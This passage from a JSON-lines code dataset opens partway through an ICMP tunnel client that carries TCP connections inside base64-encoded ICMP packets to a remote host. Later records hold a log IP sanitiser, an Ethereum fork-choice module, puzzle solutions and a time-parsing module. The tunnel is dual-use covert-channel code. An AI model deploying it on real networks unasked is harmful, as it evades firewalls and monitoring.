length = len(packet)\r\n return packet[length - self.DATA_LEN : length]\r\n \r\n def buildPackage(self,data):\r\n check_sum = 0\r\n ID = self.ID\r\n packStr = '!BBHHH' + str(self.DATA_LEN) + 's'\r\n if self.MODE == 0:\r\n packet = struct.pack(packStr,0,0,check_sum,ID,0,data)\r\n check_sum = self.checkSum(packet)\r\n packet = struct.pack(packStr,0,0,check_sum,ID,0,data)\r\n else:\r\n packet = struct.pack(packStr,8,0,check_sum,ID,0,data)\r\n check_sum = self.checkSum(packet)\r\n packet = struct.pack(packStr,8,0,check_sum,ID,0,data) \r\n return packet\r\n \r\n def getData(self,rawPacket):\r\n #去除ip header\r\n length = len(rawPacket)\r\n data = rawPacket[length - self.DATA_LEN : length]\r\n icmp_header = rawPacket[20 : 28]\r\n _type, code, checksum, packet_id, sequence = struct.unpack(\"!BBHHH\", icmp_header)\r\n return (data,packet_id)\r\n \r\n def sendto(self,data,addr):\r\n if len(data) > self.MAX_DATA_LEN:\r\n return -1\r\n data_b64_buf = base64.b64encode(data)\r\n packet_buf = self.buildPackage(data_b64_buf)\r\n _r = self.icmp_socket.sendto(packet_buf,addr)\r\n return _r\r\n\r\n def recvfrom(self,size):\r\n while True:\r\n raw_packet,addr = self.icmp_socket.recvfrom(size)\r\n data,id = self.getData(raw_packet)\r\n if id == self.ID:\r\n data_b64_str = data.decode('ascii').strip(b'\\x00'.decode())\r\n data_buf = base64.b64decode(data_b64_str)\r\n return (data_buf,addr)\r\n else:\r\n continue\r\n\r\nsockDic = {}\r\nicmpSock = 0\r\nicmpAddr = ('10.0.0.10',0)\r\ntcpAddr = ('127.0.0.1',0)\r\n\r\ndef buildPacket(sockID,opt,length,data):\r\n packet = struct.pack(\"III700s\",sockID,opt,length,data)\r\n return packet\r\n\r\ndef decodePacket(packet):\r\n sockID,opt,length,data = struct.unpack(\"III700s\",packet)\r\n return (sockID,opt,length,data)\r\n\r\ndef closeTcp(sock_id):\r\n try:\r\n sockDic[sock_id].close()\r\n del sockDic[sock_id]\r\n except BaseException:\r\n pass\r\n\r\ndef tcpRecvLoop(tcp_sock,sock_id):\r\n while True:\r\n try:\r\n data = tcp_sock.recv(700)\r\n if not data:\r\n print(\"[!]A conn closed.\")\r\n #通知远端断开客户\r\n icmpSock.sendto(buildPacket(sock_id,0xB,5,b'close'),icmpAddr)\r\n closeTcp(sock_id)\r\n break\r\n icmpSock.sendto(buildPacket(sock_id,0xC,len(data),data),icmpAddr)\r\n time.sleep(0.001)\r\n except BaseException:\r\n print(\"[!]A conn closed.\")\r\n #通知远端断开客户\r\n icmpSock.sendto(buildPacket(sock_id,0xB,5,b'close'),icmpAddr)\r\n closeTcp(sock_id)\r\n break\r\n print(\"tcpRecv thread exit!\")\r\n\r\ndef icmpLoop():\r\n while True:\r\n packet,addr = icmpSock.recvfrom(2048)\r\n try:\r\n sockID,opt,length,data = decodePacket(packet)\r\n except BaseException:\r\n continue\r\n data = data[0:length]\r\n if opt == 0xA:\r\n #connect\r\n print(\"[+]connet ID: \" + str(sockID))\r\n tcpSock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n try:\r\n tcpSock.connect(tcpAddr)\r\n except BaseException:\r\n print(\"Connet failed. Sock ID:\" + str(sockID))\r\n icmpSock.sendto(buildPacket(sockID,0xB,5,b'close'),icmpAddr)\r\n continue \r\n sockDic[sockID] = tcpSock\r\n threading.Thread(target=tcpRecvLoop,args=(tcpSock,sockID)).start()\r\n continue\r\n if opt == 0xB:\r\n print(\"[-]Close ID: \" + str(sockID))\r\n closeTcp(sockID)\r\n continue\r\n if opt == 0xC:\r\n #forward data\r\n print(\"[+]forward ID: \" + str(sockID))\r\n try:\r\n sockDic[sockID].sendall(data)\r\n except BaseException:\r\n pass\r\n \r\ndef heart():\r\n #keep live\r\n while 1:\r\n time.sleep(10)\r\n icmpSock.sendto(buildPacket(0,0xD,6,b'heart'),icmpAddr)\r\n\r\ndef init(icmpSrvAddr,localSrvAddr):\r\n global icmpAddr\r\n global tcpAddr\r\n global icmpSock\r\n #set addr\r\n icmpAddr = icmpSrvAddr\r\n tcpAddr = localSrvAddr\r\n #online\r\n icmpSock = IcmpTunnel((\"0\",0),1)\r\n icmpSock.sendto(b'online',icmpAddr)\r\n #Create tcp sock\r\n threading.Thread(target=icmpLoop).start()\r\n threading.Thread(target=heart).start()\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) < 3:\r\n print(\"client.py IcmpIpAddress TcpAddress:port\")\r\n os._exit(0)\r\n try:\r\n icmp_addr = (sys.argv[1],0)\r\n tcp_addr = (sys.argv[2].split(':')[0],int(sys.argv[2].split(':')[1]))\r\n except BaseException:\r\n os._exit(0)\r\n\r\n print(\"Remote icmp:\" + str(icmp_addr))\r\n print(\"Tcp Address:\" + str(tcp_addr))\r\n init(icmp_addr,tcp_addr)\r\n print(\"exit stop\")\r\n while True:\r\n x = input('>>')\r\n if x == 'exit':\r\n os._exit(0)","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"389208094","text":"\"\"\"\nsanitize.py - Remove IPs from pixel logs\nBased off NodeJS version.\n\nAuthor: Martín \"Netux\" Rodriguez\n\"\"\"\n\nimport re\nfrom pathlib import Path\n\n# IPv6 regex from https://stackoverflow.com/a/17871737/7492433\nIP_REGEX = re.compile(r'(?:\\d{1,3})(?:\\.(?:\\d{1,3})){3}|(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))', re.IGNORECASE)\n\nif __name__ == '__main__':\n\timport sys\n\n\tUSAGE = f'Usage: {sys.argv[0]} [path/to/pixels.log] [path/to/pixels.sanit.log]'\n\tprint_err = lambda v: sys.stderr.write(str(v) + '\\n')\n\n\tif '--help' in sys.argv:\n\t\tprint(USAGE)\n\t\tsys.exit(0)\n\n\tlog_path = Path(sys.argv[1] if len(sys.argv) > 1 else 'pixels.log')\n\toutput_path = Path(sys.argv[2] if len(sys.argv) > 2 else log_path.with_suffix('.sanit' + log_path.suffix))\n\n\tif not log_path.exists():\n\t\tprint_err(f'{log_path.name} doesn\\'t exist')\n\t\tsys.exit(1)\n\n\twith log_path.open('r', encoding='utf-8') as log_file:\n\t\twith output_path.open('w', encoding='utf-8') as output_file:\n\t\t\tfor i, line in enumerate(log_file):\n\t\t\t\t# DATE\\tUSERNAME\\tX\\tY\\tCOLOR_INDEX\\tIP\\tACTION_TYPE\n\t\t\t\tsplit_line = line.split('\\t')\n\t\t\t\tout_line = None\n\n\t\t\t\tif len(split_line) != 7:\n\t\t\t\t\tprint(f'Line {i + 1} doesn\\'t have exactly 7 fields. Manual review needed.')\n\t\t\t\t\tout_line = line\n\t\t\t\telse:\n\t\t\t\t\tdel split_line[5]\n\n\t\t\t\t\tout_line = '\\t'.join(split_line)\n\t\t\t\t\tif IP_REGEX.search(out_line):\n\t\t\t\t\t\tprint(f'Failed to remove IP on line {i + 1}. Manual review needed.')\n\t\t\t\t\t\tout_line = line\n\n\t\t\t\toutput_file.write(out_line)\n\n\t\t\tprint('Done.')\n\n","sub_path":"extras/logs/sanitize.py","file_name":"sanitize.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202272816","text":"from typing import Dict, Iterable, Optional, Sequence, Tuple, Type, Union\n\nfrom eth_utils import to_tuple\nfrom eth_utils.toolz import curry, first, mapcat, merge, merge_with, second, valmap\n\nfrom eth2.beacon.db.chain import BeaconChainDB\nfrom eth2.beacon.epoch_processing_helpers import get_attesting_indices\nfrom eth2.beacon.helpers import compute_epoch_at_slot, get_active_validator_indices\nfrom eth2.beacon.operations.attestation_pool import AttestationPool\nfrom eth2.beacon.types.attestation_data import AttestationData\nfrom eth2.beacon.types.attestations import Attestation\nfrom eth2.beacon.types.blocks import BaseBeaconBlock\nfrom eth2.beacon.types.pending_attestations import PendingAttestation\nfrom eth2.beacon.types.states import BeaconState\nfrom eth2.beacon.typing import Gwei, SigningRoot, Slot, ValidatorIndex\nfrom eth2.configs import CommitteeConfig, Eth2Config\n\n# TODO(ralexstokes) integrate `AttestationPool` once it has been merged\nAttestationIndex = Dict[ValidatorIndex, AttestationData]\nPreIndex = Dict[ValidatorIndex, Tuple[Slot, AttestationData]]\nAttestationLike = Union[Attestation, PendingAttestation]\n\n\ndef _take_latest_attestation_by_slot(\n candidates: Sequence[Tuple[Slot, AttestationData]]\n) -> Tuple[Slot, AttestationData]:\n return max(candidates, key=first)\n\n\nclass Store:\n \"\"\"\n A private class meant to encapsulate data access for the functionality in this module.\n \"\"\"\n\n def __init__(\n self,\n chain_db: BeaconChainDB,\n state: BeaconState,\n attestation_pool: AttestationPool,\n block_class: Type[BaseBeaconBlock],\n config: Eth2Config,\n ):\n self._db = chain_db\n self._block_class = block_class\n self._config = config\n self._attestation_index = self._build_attestation_index(state, attestation_pool)\n\n @curry\n def _mk_pre_index_from_attestation(\n self, state: BeaconState, attestation: AttestationLike\n ) -> Iterable[PreIndex]:\n attestation_data = attestation.data\n slot = attestation_data.slot\n\n return (\n {index: (slot, attestation_data)}\n for index in get_attesting_indices(\n state,\n attestation.data,\n attestation.aggregation_bits,\n CommitteeConfig(self._config),\n )\n )\n\n def _mk_pre_index_from_attestations(\n self, state: BeaconState, attestations: Sequence[AttestationLike]\n ) -> PreIndex:\n \"\"\"\n A 'pre-index' is a Dict[ValidatorIndex, Tuple[Slot, AttestationData]].\n \"\"\"\n return merge(*mapcat(self._mk_pre_index_from_attestation(state), attestations))\n\n def _build_attestation_index(\n self, state: BeaconState, attestation_pool: AttestationPool\n ) -> AttestationIndex:\n \"\"\"\n Assembles a dictionary of latest attestations keyed by validator index.\n Any attestation made by a validator in the ``attestation_pool`` that occur after the\n last known attestation according to the state take precedence.\n\n We start by building a 'pre-index' from all known attestations which map validator\n indices to a pair of slot and attestation data. A final index is built from all\n pre-indices by keeping the entry with the highest slot across the set of all\n duplicates in the pre-indices keyed by validator index.\n \"\"\"\n previous_epoch_index = self._mk_pre_index_from_attestations(\n state, state.previous_epoch_attestations\n )\n\n current_epoch_index = self._mk_pre_index_from_attestations(\n state, state.current_epoch_attestations\n )\n\n pool_index = self._mk_pre_index_from_attestations(\n state, tuple(attestation for _, attestation in attestation_pool)\n )\n\n index_by_latest_slot = merge_with(\n _take_latest_attestation_by_slot,\n previous_epoch_index,\n current_epoch_index,\n pool_index,\n )\n # convert the index to a mapping of ValidatorIndex -> (latest) Attestation\n return valmap(second, index_by_latest_slot)\n\n def _get_latest_attestation(\n self, index: ValidatorIndex\n ) -> Optional[AttestationData]:\n \"\"\"\n Return the latest attesation we know from the validator with the\n given ``index``.\n \"\"\"\n return self._attestation_index.get(index, None)\n\n def _get_block_by_root(self, root: SigningRoot) -> BaseBeaconBlock:\n return self._db.get_block_by_root(root, self._block_class)\n\n def get_latest_attestation_target(\n self, index: ValidatorIndex\n ) -> Optional[BaseBeaconBlock]:\n attestation = self._get_latest_attestation(index)\n if not attestation:\n return None\n try:\n target_block = self._get_block_by_root(attestation.beacon_block_root)\n except KeyError:\n # attestation made for a block we have not imported\n return None\n return target_block\n\n def _get_parent_block(self, block: BaseBeaconBlock) -> BaseBeaconBlock:\n return self._db.get_block_by_root(block.parent_root, self._block_class)\n\n def get_ancestor(self, block: BaseBeaconBlock, slot: Slot) -> BaseBeaconBlock:\n \"\"\"\n Return the block in the chain that is a\n predecessor of ``block`` at the requested ``slot``.\n \"\"\"\n if block.slot > slot:\n return self.get_ancestor(self._get_parent_block(block), slot)\n elif block.slot == slot:\n return block\n else:\n return None\n\n\nAttestationTarget = Tuple[ValidatorIndex, Optional[BaseBeaconBlock]]\n\n\n@curry\ndef _find_latest_attestation_target(\n store: Store, index: ValidatorIndex\n) -> AttestationTarget:\n return (index, store.get_latest_attestation_target(index))\n\n\n@to_tuple\ndef _find_latest_attestation_targets(\n state: BeaconState, store: Store, config: Eth2Config\n) -> Iterable[AttestationTarget]:\n epoch = compute_epoch_at_slot(state.slot, config.SLOTS_PER_EPOCH)\n active_validators = get_active_validator_indices(state.validators, epoch)\n return filter(\n second, map(_find_latest_attestation_target(store), active_validators)\n )\n\n\ndef _get_ancestor(store: Store, block: BaseBeaconBlock, slot: Slot) -> BaseBeaconBlock:\n return store.get_ancestor(block, slot)\n\n\ndef _balance_for_validator(state: BeaconState, validator_index: ValidatorIndex) -> Gwei:\n return state.validators[validator_index].effective_balance\n\n\ndef score_block_by_attestations(\n state: BeaconState,\n store: Store,\n attestation_targets: Sequence[AttestationTarget],\n block: BaseBeaconBlock,\n) -> int:\n \"\"\"\n Return the total balance attesting to ``block`` based on the ``attestation_targets``.\n \"\"\"\n return sum(\n _balance_for_validator(state, validator_index)\n for validator_index, target in attestation_targets\n if _get_ancestor(store, target, block.slot) == block\n )\n\n\ndef score_block_by_root(block: BaseBeaconBlock) -> int:\n return int.from_bytes(block.hash_tree_root[:8], byteorder=\"big\")\n\n\n@curry\ndef lmd_ghost_scoring(\n chain_db: BeaconChainDB,\n attestation_pool: AttestationPool,\n state: BeaconState,\n config: Eth2Config,\n block_class: Type[BaseBeaconBlock],\n block: BaseBeaconBlock,\n) -> int:\n \"\"\"\n Return the score of the ``target_block`` according to the LMD GHOST algorithm,\n using the lexicographic ordering of the block root to break ties.\n \"\"\"\n store = Store(chain_db, state, attestation_pool, block_class, config)\n\n attestation_targets = _find_latest_attestation_targets(state, store, config)\n\n attestation_score = score_block_by_attestations(\n state, store, attestation_targets, block\n )\n\n block_root_score = score_block_by_root(block)\n\n return attestation_score + block_root_score\n","sub_path":"eth2/beacon/fork_choice/lmd_ghost.py","file_name":"lmd_ghost.py","file_ext":"py","file_size_in_byte":7855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109987831","text":"\"\"\"\n1473. Paint House III (Hard)\n\nThere is a row of m houses in a small city, each house must be painted with one of the n colors (labeled from 1 to n), some houses that has been painted last summer should not be painted again.\n\nA neighborhood is a maximal group of continuous houses that are painted with the same color. (For example: houses = [1,2,2,3,3,2,1,1] contains 5 neighborhoods [{1}, {2,2}, {3,3}, {2}, {1,1}]).\n\nGiven an array houses, an m * n matrix cost and an integer target where:\n\nhouses[i]: is the color of the house i, 0 if the house is not painted yet.\ncost[i][j]: is the cost of paint the house i with the color j+1.\nReturn the minimum cost of painting all the remaining houses in such a way that there are exactly target neighborhoods, if not possible return -1.\n\n \n\nExample 1:\n\nInput: houses = [0,0,0,0,0], cost = [[1,10],[10,1],[10,1],[1,10],[5,1]], m = 5, n = 2, target = 3\nOutput: 9\nExplanation: Paint houses of this way [1,2,2,1,1]\nThis array contains target = 3 neighborhoods, [{1}, {2,2}, {1,1}].\nCost of paint all houses (1 + 1 + 1 + 1 + 5) = 9.\nExample 2:\n\nInput: houses = [0,2,1,2,0], cost = [[1,10],[10,1],[10,1],[1,10],[5,1]], m = 5, n = 2, target = 3\nOutput: 11\nExplanation: Some houses are already painted, Paint the houses of this way [2,2,1,2,2]\nThis array contains target = 3 neighborhoods, [{2,2}, {1}, {2,2}]. \nCost of paint the first and last house (10 + 1) = 11.\nExample 3:\n\nInput: houses = [0,0,0,0,0], cost = [[1,10],[10,1],[1,10],[10,1],[1,10]], m = 5, n = 2, target = 5\nOutput: 5\nExample 4:\n\nInput: houses = [3,1,2,3], cost = [[1,1,1],[1,1,1],[1,1,1],[1,1,1]], m = 4, n = 3, target = 3\nOutput: -1\nExplanation: Houses are already painted with a total of 4 neighborhoods [{3},{1},{2},{3}] different of target = 3.\n \n\nConstraints:\n\nm == houses.length == cost.length\nn == cost[i].length\n1 <= m <= 100\n1 <= n <= 20\n1 <= target <= m\n0 <= houses[i] <= n\n1 <= cost[i][j] <= 10^4\n\"\"\"\n\nclass Solution(object):\n def minCost(self, houses, cost, m, n, target):\n \"\"\"\n :type houses: List[int]\n :type cost: List[List[int]]\n :type m: int\n :type n: int\n :type target: int\n :rtype: int\n \"\"\"\n # wrong dfs will be TLE\n todos = [i for i in range(m) if houses[i] == 0]\n\n # sort cost\n sort_cost = []\n for i, tmpcost in enumerate(cost):\n newcost = zip(tmpcost, range(1,n+1))\n newcost.sort()\n newcost = [(item[1], item[0]) for item in newcost]\n sort_cost.append(newcost)\n # print(cost)\n # print(sort_cost)\n # return\n\n # sanity check\n def check_cnt():\n diffs = []\n for item in houses:\n if item == 0:\n continue\n if len(diffs) == 0 or item != diffs[-1]:\n diffs.append(item)\n return len(diffs)\n\n # houses = [1,2,1,0,0]\n # print(check_cnt())\n # exit()\n\n if check_cnt() > target:\n return -1\n if len(todos) == 0:\n if check_cnt() == target:\n return 0\n else:\n return -1\n\n def calculate_cost():\n tmpres = 0\n for i, item in enumerate(houses):\n if item > 0:\n tmpres += cost[i][item-1]\n return tmpres\n\n self.result = float('inf')\n\n def dfs(idx):\n print('work on', idx)\n # work on todos[idx]\n r_idx = todos[idx]\n if idx == len(todos) - 1: # edge case\n for c, _ in sort_cost[r_idx]: # range(1, n+1):\n houses[r_idx] = c\n if check_cnt() == target:\n # calculate cost\n tmpres = calculate_cost()\n self.result = min(tmpres, self.result)\n houses[r_idx] = 0\n else:\n # for i in range(1, n+1):\n for c, _ in sort_cost[r_idx]:\n houses[r_idx] = c\n tmp_cnt = check_cnt()\n if tmp_cnt > target: # too many colors\n continue\n if tmp_cnt + len(todos) -1 - idx < target: # too few\n continue\n if calculate_cost() > self.result:\n continue\n dfs(idx+1)\n houses[r_idx] = 0\n\n dfs(0)\n if self.result == float('inf'):\n return -1\n result = self.result - calculate_cost()\n return result\n\n def solve2(self, houses, cost, m, n, target):\n\n memo = {}\n if houses[-1] == 0:\n for i, c in enumerate(cost[-1]):\n memo[1, i+1] = c\n else:\n memo[1, houses[-1]] = 0\n # print(memo)\n\n for ind in range(m-2, -1, -1):\n new_memo = {}\n # case 1: occupied\n if houses[ind] > 0:\n for k, color in memo.keys():\n if color == houses[ind]:\n new_memo[k, houses[ind]] = min(new_memo.get((k, houses[ind]), float('inf')), memo[k, color])\n else:\n new_memo[k+1, houses[ind]] = min(new_memo.get((k+1, houses[ind]),float('inf')), memo[k, color])\n else: # not occupied\n for c in range(1, n+1):\n for k, color in memo.keys():\n if c == color:\n new_memo[k, c] = min(new_memo.get((k,c), float('inf')), memo[k, color] + cost[ind][c-1])\n else:\n new_memo[k+1, c] = min(new_memo.get((k+1,c), float('inf')), memo[k, color] + cost[ind][c-1])\n memo = new_memo\n keys = memo.keys()\n for k in keys:\n if k[0] > target:\n del memo[k]\n \n result = float('inf')\n for k in memo.keys():\n if k[0] == target:\n result = min(result, memo[k])\n if result == float('inf'):\n return -1\n return result\n\n def solve3(self, A, cost, m, n, target):\n dp, dp2 = {(0, 0): 0}, {}\n for i, a in enumerate(A):\n for cj in (range(1, n + 1) if a == 0 else [a]):\n for ci, b in dp:\n b2 = b + (ci != cj)\n if b2 > target: continue\n dp2[cj, b2] = min(dp2.get((cj,b2), float('inf')), dp[ci, b] + (cost[i][cj - 1] if cj != a else 0))\n dp, dp2 = dp2, {}\n return min([dp[c, b] for c, b in dp if b == target] or [-1])\n\n\nif __name__ == \"__main__\":\n a = Solution()\n \"\"\"\n print(a.solve2([0,0,0,0,0], [[1,10],[10,1],[10,1],[1,10],[5,1]], 5, 2, 3))\n print(a.solve2([0,2,1,2,0], [[1,10],[10,1],[10,1],[1,10],[5,1]], 5, 2, 3))\n print(a.solve2([0,0,0,0,0], [[1,10],[10,1],[1,10],[10,1],[1,10]], 5, 2, 5))\n print(a.solve2([3,1,2,3], [[1,1,1],[1,1,1],[1,1,1],[1,1,1]], 4, 3, 3))\n print(a.solve2([2,2,1], [[1,1],[3,4],[4,2]], 3, 2, 2))\n print(a.solve2([1,1,1,0,2,0,0,2,0,0], [[6,8,5],[4,8,3],[7,1,10],[4,9,8],[4,7,6],[6,5,1],[8,9,4],[7,6,3],[9,5,10],[8,8,4]], 10, 3, 10))\n \"\"\"\n houses = [4,0,0,0,4,11,0,0,0,0,3,0,0,0,0,5,0,0,0,0,0,8,2,2,0]\n cost = [[33,13,38,3,25,10,49,9,10,36,39,3],[47,19,6,37,2,23,50,18,46,14,24,33],[32,31,32,17,36,41,43,29,36,29,47,3],[25,27,5,31,1,17,27,46,10,8,31,49],[50,16,33,24,42,2,33,39,43,31,2,38],[38,6,23,18,9,13,31,36,28,7,7,1],[40,23,21,5,48,2,18,24,6,27,39,44],[25,43,4,9,5,5,30,42,23,41,7,15],[45,32,44,15,5,1,2,43,49,30,29,4],[39,26,42,45,27,28,41,6,42,27,4,43],[32,2,43,13,15,30,32,12,36,5,19,22],[12,23,13,8,8,9,32,43,46,41,43,8],[10,18,27,2,7,40,44,50,32,29,42,10],[50,7,15,9,32,9,15,10,15,41,10,36],[48,6,26,6,14,37,44,47,4,44,1,30],[34,46,12,32,19,1,18,31,1,16,44,48],[15,35,17,14,16,29,23,18,28,26,45,17],[43,45,7,39,37,18,18,33,24,47,27,46],[17,12,15,20,44,34,14,8,28,40,12,21],[18,10,15,47,21,7,47,34,37,49,16,24],[19,3,38,14,32,21,4,25,34,3,33,23],[21,45,3,49,45,40,38,10,30,5,37,21],[29,38,43,22,44,26,3,18,45,40,40,17],[21,12,30,23,4,25,32,43,37,15,35,30],[38,14,6,21,3,43,43,30,9,19,39,17]]\n m = 25\n n = 12\n target = 15\n print(a.solve3(houses, cost, m, n, target))\n","sub_path":"python/leetcode/dp/1473_paint_house_iii.py","file_name":"1473_paint_house_iii.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"434507020","text":"# -*- coding: utf-8 -*-\n# Project Euler 53\n\nimport sympy\n\nans = 0\n\nfor n in range(23, 101):\n tmp_ans = 0\n\n for r in range(n//2, -1, -1):\n if sympy.binomial(n, r) <= 1e6:\n break\n\n tmp_ans += 1\n\n ans += tmp_ans * 2 - (1 if n % 2 == 0 else 0)\n\nprint(ans)\n\n\n\n\n","sub_path":"project_euler/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"287069655","text":"\nIN_PWEAVE = __name__ == '__builtin__'\n\n# python standard library\nimport re\nimport math\nfrom datetime import timedelta\nfrom datetime import datetime\nif IN_PWEAVE:\n import os\n\n# third-party\nfrom dateutil.relativedelta import relativedelta\nimport dateutil.parser\nfrom validate import Validator\n\n# this package\nfrom theape import BaseClass\nfrom theape import ApeError\nfrom theape.parts.oatbran import CharacterClass, Numbers, Group\nfrom theape.parts.oatbran import CommonPatterns\nfrom theape.infrastructure.code_graphs import module_diagram, class_diagram\n\nZERO = '0'\nINT_ZERO = 0\nONE = 1\nMICRO = 10**6\n\nclass RelativeTimeMapGroups(object):\n __slots__ = ()\n years = 'years'\n months = 'months'\n weeks = 'weeks'\n days = 'days'\n hours = 'hours'\n minutes = 'minutes'\n seconds = 'seconds'\n# end RelativeTimeMapGroups\n\nclass RelativeTimeMap(BaseClass):\n \"\"\"\n A converter from strings with relative times to seconds\n \"\"\"\n def __init__(self):\n super(RelativeTimeMap, self).__init__()\n self._year_expression = None\n self._month_expression = None\n self._week_expression = None\n self._day_expression = None\n self._hour_expression = None\n self._minute_expression = None\n self._second_expression = None\n return\n\n @property\n def year_expression(self):\n \"\"\"\n A compiled regex to match a year (only checks for y)\n \"\"\"\n if self._year_expression is None:\n self._year_expression = re.compile(Group.named(name=RelativeTimeMapGroups.years,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Yy')\n )\n return self._year_expression\n\n @property\n def month_expression(self):\n \"\"\"\n A compiled regex to match a month (check for 'mo' only)\n \"\"\"\n if self._month_expression is None:\n self._month_expression = re.compile(Group.named(name=RelativeTimeMapGroups.months,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Mm') +\n CharacterClass.character_class('Oo'))\n return self._month_expression\n\n @property\n def week_expression(self):\n \"\"\"\n A compiled regex to extract a number of weeks\n \"\"\"\n if self._week_expression is None:\n self._week_expression = re.compile(Group.named(name=RelativeTimeMapGroups.weeks,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Ww'))\n return self._week_expression\n\n @property\n def day_expression(self):\n \"\"\"\n A compiled regex to extract the number of days\n \"\"\"\n if self._day_expression is None:\n self._day_expression = re.compile(Group.named(name=RelativeTimeMapGroups.days,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Dd'))\n return self._day_expression\n\n @property\n def hour_expression(self):\n \"\"\"\n A compiled regex to extract the number of hours\n \"\"\"\n if self._hour_expression is None:\n self._hour_expression = re.compile(Group.named(name=RelativeTimeMapGroups.hours,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Hh'))\n return self._hour_expression\n\n @property\n def minute_expression(self):\n \"\"\"\n A compiled regex to extract the number of minutes\n \"\"\"\n if self._minute_expression is None:\n self._minute_expression = re.compile(Group.named(name=RelativeTimeMapGroups.minutes,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Mm') +\n CharacterClass.character_class('Ii'))\n return self._minute_expression\n\n @property\n def second_expression(self):\n \"\"\"\n A compiled regex to extract the number of seconds\n \"\"\"\n if self._second_expression is None:\n self._second_expression = re.compile(Group.named(name=RelativeTimeMapGroups.seconds,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Ss'))\n return self._second_expression\n#end class RelativeTimeMap\n\ndef source_required(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n \"\"\"\n def wrapped(self, *args, **kwargs):\n try:\n return method(self, *args, **kwargs)\n except (AttributeError, TypeError) as error:\n self.log_error(error)\n raise ApeError(\"self.source not set ('{0}')\".format(self.source))\n return wrapped\n\ndef operation_error(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n - `message`: for ApeError\n \"\"\"\n def wrapped(self, other):\n try:\n return method(self, other)\n except TypeError as error:\n self.log_error(error)\n raise ApeError(\"operand must be timedelta object, not '{0}\".format(other))\n return wrapped\n\ndef number_error(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n \"\"\"\n def wrapped(self, other):\n try:\n return method(self, other)\n except TypeError as error:\n self.log_error(error)\n raise ApeError(\"operand must be numeric object, not '{0}\".format(other))\n return wrapped\n\ndef unary_error(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n \"\"\"\n def wrapped(self):\n try:\n return method(self)\n except TypeError as error:\n self.log_error(error)\n raise ApeError(\"timedelta must be object, not '{0}\".format(self.timedelta))\n return wrapped\n\nclass RelativeTime(BaseClass):\n \"\"\"\n A timedeltas extension\n \"\"\"\n def __init__(self, source=None):\n \"\"\"\n RelativeTime constructor\n\n :param:\n\n - `source`: A string with relative time in it (e.g. '1week 2 days 4.2 seconds')\n \"\"\"\n super(RelativeTime, self).__init__()\n self.timedelta = None\n self._time_map = None\n self._source = None\n self.source = source \n return\n\n @property\n def source(self):\n \"\"\"\n :return: the source string\n \"\"\"\n return self._source\n\n @source.setter\n def source(self, source):\n \"\"\"\n sets the source and all the time values (if source is None, resets the values)\n \"\"\"\n self._source = source\n if source is not None: \n self.populate_fields()\n else:\n self.reset()\n return\n \n @property\n def time_map(self):\n \"\"\"\n A relative time map instance to parse the source.\n \"\"\"\n if self._time_map is None:\n self._time_map = RelativeTimeMap()\n return self._time_map\n\n @property\n @source_required\n def days(self):\n \"\"\"\n gets the timedelta days\n\n :return: number of days as an integer\n :raise: ApeError if the timedelta hasn't been built\n \"\"\"\n return self.timedelta.days\n \n @property\n @source_required\n def seconds(self):\n \"\"\"\n Gets the seconds from the time-delta\n\n :return: seconds (not total-seconds) as integer\n :raise: ApeError if the timedelta hasn't been built\n \"\"\"\n return self.timedelta.seconds\n\n @property\n @source_required\n def microseconds(self):\n \"\"\"\n Gets the microseconds from the timedelta\n\n :return: seconds (not total-seconds) as an integer\n :raise: ApeError if the timedelta not built not set\n \"\"\"\n return self.timedelta.microseconds\n\n @source_required\n def 